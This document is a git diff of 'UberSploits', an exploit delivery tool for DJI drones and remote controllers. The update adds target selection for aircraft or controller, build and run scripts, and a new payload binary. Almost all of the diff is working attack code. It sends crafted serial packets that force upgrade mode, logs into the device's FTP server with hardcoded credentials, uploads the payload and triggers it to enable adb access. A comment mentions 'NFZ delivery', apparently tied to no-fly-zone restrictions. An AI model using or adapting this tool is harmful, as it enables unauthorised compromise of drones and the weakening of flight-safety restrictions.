diff --git a/build.sh b/build.sh new file mode 100755 index 0000000..edce2fc --- /dev/null +++ b/build.sh @@ -0,0 +1,14 @@ +#!/bin/sh +JAVAC=`which javac` +if [ $JAVAC ]; then + echo Building classes ... + $JAVAC -cp libs/commons-net-3.8.0.jar:libs/jSerialComm-2.7.0.jar:src src/com/cunninglogic/ubersploits/CRC.java + RESULT1=$? + $JAVAC -cp libs/commons-net-3.8.0.jar:libs/jSerialComm-2.7.0.jar:src src/com/cunninglogic/ubersploits/Main.java + RESULT2=$? + if [ $RESULT1 = 0 ] && [ $RESULT2 = 0 ]; then + echo OK + fi +else + echo Error: No javac. Please install javac/jdk. +fi diff --git a/libs/commons-net-3.6.jar b/libs/commons-net-3.6.jar deleted file mode 100644 index 4537623..0000000 Binary files a/libs/commons-net-3.6.jar and /dev/null differ diff --git a/libs/commons-net-3.8.0.jar b/libs/commons-net-3.8.0.jar new file mode 100644 index 0000000..dffce28 Binary files /dev/null and b/libs/commons-net-3.8.0.jar differ diff --git a/libs/jSerialComm-1.3.11.jar b/libs/jSerialComm-1.3.11.jar deleted file mode 100644 index f1979aa..0000000 Binary files a/libs/jSerialComm-1.3.11.jar and /dev/null differ diff --git a/libs/jSerialComm-2.7.0.jar b/libs/jSerialComm-2.7.0.jar new file mode 100644 index 0000000..0de97db Binary files /dev/null and b/libs/jSerialComm-2.7.0.jar differ diff --git a/run.sh b/run.sh new file mode 100755 index 0000000..369c115 --- /dev/null +++ b/run.sh @@ -0,0 +1,7 @@ +#!/bin/sh +JAVA=`which java` +if [ $JAVA ]; then + $JAVA -cp libs/commons-net-3.8.0.jar:libs/jSerialComm-2.7.0.jar:src com/cunninglogic/ubersploits/Main +else + echo Error: No java. Please install java/jdk. +fi diff --git a/src/com/cunninglogic/ubersploits/Main.java b/src/com/cunninglogic/ubersploits/Main.java index 7d5e0af..efe0555 100644 --- a/src/com/cunninglogic/ubersploits/Main.java +++ b/src/com/cunninglogic/ubersploits/Main.java @@ -16,7 +16,7 @@ public class Main { private static FTPClient ftpClient; public static void main(String[] args) { - System.out.println("UberSploits v0.1 by jcase"); + System.out.println("UberSploits v0.2 by jcase,validev"); System.out.println("Please see licensing details for the libraries we use inside the libs directory.\n"); System.out.println("UberSploits is an exploit delivery tool for DJI, it effectively brings back to life a bunch" + @@ -34,9 +34,41 @@ public static void main(String[] args) { classLoader = Main.class.getClassLoader(); - int count = 1; - System.out.println("Choose target port: (* suggested port)"); + System.out.println("\nChoose target:"); + System.out.println("\t[1] Aircraft (e.g. Mavic Pro)"); + System.out.println("\t[2] Remote Control (e.g. Mavic Pro RC)"); + String str = ""; + BufferedReader br = new BufferedReader(new InputStreamReader(System.in)); + + int target; + System.out.print("Choose target: "); + while (true) { + try { + str = br.readLine(); + } catch (IOException e) { + e.printStackTrace(); + } + try { + + target = Integer.parseInt(str.trim()); + + if ((target > 2) || (target < 1)) { + System.out.println("[!] Invalid target selection"); + System.out.print("Choose target: "); + } else { + System.out.println("Using Target: " + target); + break; + } + } catch (NumberFormatException e) { + System.out.println("[!] Invalid target selection"); + System.out.print("Choose target: "); + } + } + + + int count = 1; + System.out.println("\nChoose target port: (* suggested port)"); for (SerialPort s : SerialPort.getCommPorts()) { if (s.getDescriptivePortName().contains("DJI")) { System.out.print("*"); @@ -48,8 +80,8 @@ public static void main(String[] args) { System.out.println("\t[E] Exit"); - String str = ""; - BufferedReader br = new BufferedReader(new InputStreamReader(System.in)); + int port; + br = new BufferedReader(new InputStreamReader(System.in)); System.out.print("Choose port: "); while (true) { try { @@ -65,7 +97,7 @@ public static void main(String[] args) { } - int port = Integer.parseInt(str.trim()); + port = Integer.parseInt(str.trim()); if ((port > count) || (port < 1)) { System.out.println("[!] Invalid port selection"); @@ -83,99 +115,93 @@ public static void main(String[] args) { if (activePort == null) { System.out.println("Couldn't find port, exiting"); - return; + System.exit(0); } if (activePort.isOpen()) { System.out.println(activePort.getSystemPortName() + " is already open"); activePort.closePort(); //meh why not - return; + System.exit(0); } if (!activePort.openPort()) { System.out.println("Couldn't open port, please close all other DUML/DJI Apps and try again"); activePort.closePort(); //meh why not - return; + System.exit(0); } activePort.setBaudRate(115200); - System.out.println("Reading payload"); + System.out.println("\nReading payload ..."); + + String payloadfile = ""; + String ftptarget = ""; + switch(target) { + case 1: payloadfile = "resources/payload.bin"; + ftptarget = "upgrade/data_copy.bin"; + break; + case 2: payloadfile = "resources/payloadRC.bin"; + ftptarget = "upgrade/dji_system.bin"; + break; + default: + System.out.println("Invalid target. Exiting."); + System.exit(0); + } - InputStream is = classLoader.getResourceAsStream("resources/payload.bin"); + InputStream is = classLoader.getResourceAsStream(payloadfile); byte[] payload = null; try { - payload = isToArray(classLoader.getResourceAsStream("resources/payload.bin")); + payload = isToArray(classLoader.getResourceAsStream(payloadfile)); is.close(); - } catch (IOException e) { - e.printStackTrace(); - } - System.out.println("Entering upgrade mode"); - write(UPGRADE_MODE_ENTER()); + System.out.println("Entering upgrade mode ..."); + write(UPGRADE_MODE_ENTER(target)); - try { Thread.sleep(1000); - } catch (InterruptedException e) { - e.printStackTrace(); - } - System.out.println("Sending filesize"); - write(UPGRADE_DATA(payload.length)); + if(target==2) { + System.out.println("Enable reporting ..."); + write(UPGRADE_MODE_ENABLE_REPORTING()); + + Thread.sleep(1000); + } + + System.out.println("Sending filesize ..."); + write(UPGRADE_DATA(target, payload.length)); - try { Thread.sleep(1000); - } catch (InterruptedException e) { - e.printStackTrace(); - } - System.out.println("Uploading payload"); - ftpClient = new FTPClient(); - try { + System.out.println("Uploading payload ..."); + ftpClient = new FTPClient(); ftpClient.connect("192.168.42.2", 21); ftpClient.login("dontforget","aboutjcase"); ftpClient.enterLocalPassiveMode(); ftpClient.setFileType(ftpClient.BINARY_FILE_TYPE); - is = classLoader.getResourceAsStream("resources/payload.bin"); - ftpClient.storeFile("/upgrade/data_copy.bin", is); + is = classLoader.getResourceAsStream(payloadfile); + ftpClient.storeFile(ftptarget, is); is.close(); - } catch (IOException e) { - e.printStackTrace(); - } - try { Thread.sleep(1000); - } catch (InterruptedException e) { - e.printStackTrace(); - } - System.out.println("Executing update"); - write(UPGRADE_FINISH_DATA(payload)); + System.out.println("Executing upgrade ..."); + write(UPGRADE_FINISH_DATA(target, payload)); - try { Thread.sleep(1000); - } catch (InterruptedException e) { - e.printStackTrace(); - } - System.out.println("Finished (system may still be processing the update)"); + System.out.println("Finished! adb access should be enabled.\n"); - try { ftpClient.disconnect(); activePort.closePort(); - } catch (IOException e) { + + } catch (Exception e) { e.printStackTrace(); } } - private static void write(byte[] packet) { + private static void write(byte[] packet) throws Exception { activePort.writeBytes(packet,packet.length); - try { - Thread.sleep(1000); - } catch (InterruptedException e) { - e.printStackTrace(); - } + Thread.sleep(1000); } private static byte[] isToArray(InputStream is) throws IOException { @@ -193,22 +219,56 @@ private static byte[] isToArray(InputStream is) throws IOException { return buffer.toByteArray(); } - /* - -UPGRADE_MODE_ENTER - 0,HS,28637,55 16 04 FC 2A 28 B8 51 40 00 07 00 00 00 00 00 00 00 00 00 9F BF -UPGRADE_DATA 0,HS,28831,55 1A 04 B1 2A 28 BB 51 40 00 08 00 C8 57 08 00 00 00 00 00 00 00 02 08 2E 88 -UPGRADE_FINISH_DATA 0,HS,46759,55 1E 04 8A 2A 28 CE 51 40 00 0A 00 A5 1B BF 03 A2 B5 0D F6 DB 1C 5B 28 EF 5D 7A D9 9E 39 - */ - private static byte[] UPGRADE_MODE_ENTER() { - byte[] packet = new byte[] {0x55,0x16,0x04,(byte)0xFC,0x2A,0x28,(byte)0xB8,0x51,0x40,0x00,0x07,0x00,0x00,0x00, - 0x00,0x00,0x00,0x00,0x00,0x00}; +/* + NFZ delivery, AC + UPGRADE_MODE_ENTER - 0,HS,28637,55 16 04 FC 2A 28 B8 51 40 00 07 00 00 00 00 00 00 00 00 00 9F BF + UPGRADE_DATA 0,HS,28831,55 1A 04 B1 2A 28 BB 51 40 00 08 00 C8 57 08 00 00 00 00 00 00 00 02 08 2E 88 + UPGRADE_FINISH_DATA 0,HS,46759,55 1E 04 8A 2A 28 CE 51 40 00 0A 00 A5 1B BF 03 A2 B5 0D F6 DB 1C 5B 28 EF 5D 7A D9 9E 39 + + Upgrade delivery, RC + Change target from 28 to 2D + change upgrade data mode from 02 08 to 02 04 + +*/ + + private static byte[] UPGRADE_MODE_ENTER(int target) throws Exception { + byte[] packet; + switch(target) { + case 1: + packet = new byte[] {0x55,0x16,0x04,(byte)0xFC,0x2A,0x28,(byte)0xB8,0x51,0x40,0x00,0x07,0x00,0x00,0x00, + 0x00,0x00,0x00,0x00,0x00,0x00}; + break; + case 2: + packet = new byte[] {0x55,0x16,0x04,(byte)0xFC,0x2A,0x2D,(byte)0xB8,0x51,0x40,0x00,0x07,0x00,0x00,0x00, + 0x00,0x00,0x00,0x00,0x00,0x00}; + break; + default: + throw new Exception(); + } + return CRC.pktCRC(packet); + } + + private static byte[] UPGRADE_MODE_ENABLE_REPORTING() { + byte[] packet = new byte[] {0x55,0x16,0x04,(byte)0xFC,0x2A,0x2D,(byte)0xB8,0x51,0x40,0x00,0x0C,0x00}; return CRC.pktCRC(packet); } - private static byte[] UPGRADE_DATA(int fileSize) { - byte[] packet = new byte[] {0x55,0x1A,0x04,(byte)0xB1,0x2A,0x28,(byte)0xBB,0x51,0x40,0x00,0x08,0x00,0x00,0x00, - 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x08}; + private static byte[] UPGRADE_DATA(int target, int fileSize) throws Exception { + byte[] packet; + switch(target) { + case 1: + packet = new byte[] {0x55,0x1A,0x04,(byte)0xB1,0x2A,0x28,(byte)0xBB,0x51,0x40,0x00,0x08,0x00,0x00,0x00, + 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x08}; + break; + case 2: + packet = new byte[] {0x55,0x1A,0x04,(byte)0xB1,0x2A,0x2D,(byte)0xBB,0x51,0x40,0x00,0x08,0x00,0x00,0x00, + 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x04}; + break; + default: + throw new Exception(); + } + byte[] size = ByteBuffer.allocate(4).putInt(fileSize).array(); packet[12] = size[3]; @@ -219,10 +279,20 @@ private static byte[] UPGRADE_DATA(int fileSize) { return CRC.pktCRC(packet); } - private static byte[] UPGRADE_FINISH_DATA(byte[] payload) { - byte[] packet = new byte[] {0x55,0x1E,0x04,(byte)0x8A,0x2A,0x28,(byte)0xCE,0x51,0x40, 0x00, 0x0A, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}; - + private static byte[] UPGRADE_FINISH_DATA(int target, byte[] payload) throws Exception { + byte[] packet; + switch(target) { + case 1: + packet = new byte[] {0x55,0x1E,0x04,(byte)0x8A,0x2A,0x28,(byte)0xCE,0x51,0x40, 0x00, 0x0A, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}; + break; + case 2: + packet = new byte[] {0x55,0x1E,0x04,(byte)0x8A,0x2A,0x2D,(byte)0xCE,0x51,0x40, 0x00, 0x0A, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}; + break; + default: + throw new Exception(); + } byte[] md5 = payload; try { diff --git a/src/resources/payloadRC.bin b/src/resources/payloadRC.bin new file mode 100644 index 0000000..79f3f1b Binary files /dev/null and b/src/resources/payloadRC.bin differ